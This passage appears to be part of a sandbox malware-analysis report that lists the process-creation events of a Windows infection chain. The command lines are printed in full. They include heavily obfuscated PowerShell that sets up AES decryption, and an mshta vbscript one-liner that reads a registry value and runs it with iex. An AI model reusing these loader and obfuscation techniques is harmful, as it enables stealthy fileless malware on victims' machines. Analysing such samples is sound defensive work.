tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKl
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close")
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -DJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 